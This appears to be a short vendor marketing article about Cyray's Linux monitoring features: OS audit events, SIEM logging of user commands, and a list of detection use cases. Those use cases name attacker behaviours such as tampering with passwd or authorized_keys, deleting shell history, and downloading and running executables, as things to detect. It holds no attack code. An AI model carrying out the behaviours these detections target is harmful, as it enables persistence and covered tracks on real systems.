Advanced Linux threats Monitoring

In this article, we will discuss Unix\Linux’s standard Monitoring capabilities and will present Cyray’s unique developments that expand and upgrade Linux Monitoring Capabilities. These capabilities are being deployed at our customer’s monitored environment.


TrendMicro’s article “A Look at Linux”, discusses how Linux has become an attractive target for attackers, as well as how it is prone to a variety of threats and risks. The authors discuss a few main risks and threats including vulnerabilities, misconfigurations and security gaps, and malware.

The total number of publicly exposed FTP servers according to a Shodan search performed on January 5, 2021

As part of the increasing demand for visibility of the organization systems, some of the most significant black holes are the Linux\Unix activities and the ability to track them.

A large portion of the core components and critical systems in the organization will have a Linux operating system, for example:

Network components – Switches/routers FW \ IPS \ WAF

Virtualization – Vmware \ ESX \ Dockers

At Cyray`s, we have taken the essential data at all levels and developed unique new monitoring capabilities (Linux CLI).

OS Audit :

  • Change passwords of existing accounts
  • Unlock or un-expire locked or expired accounts
  • Create new accounts
  • Delete accounts
  • Delete log files
  • Change log files
  • Delete or change system configuration files
  • USB Drive connections 
  • Mount activities

Linux CLI:

We have developed a unique capability of collecting all the user’s commands that run on the operating system and receive them in the SIEM system with a log enriched with a lot of additional information. This allows us to provide our customers with a much more robust defense capability in addition to OS AUDIT:

Each Log will supply the following fields:

  1. Time
  2. Server name
  3. Username
  4. Command
  5. Execution path
  6. Operating system type
  7. SSH session
  8. SSH source address
  9. SSH source hostname
  10.  Source Port 
  11.  Destination port

A few additional examples for monitoring capabilities developed by Cyray’s team and are used by our Customers::

  1. Dealing with ‘aliases’ file.
  2. Dealing with ‘passwd’ file.
  3. Dealing with SSH ‘authorization_keys’ file.
  4. History commands were deleted.
  5. The user created a simple HTTP server using Python.
  6. The user downloaded and ran an execution file
  7. from the Internet.


Share This Story, Choose Your Platform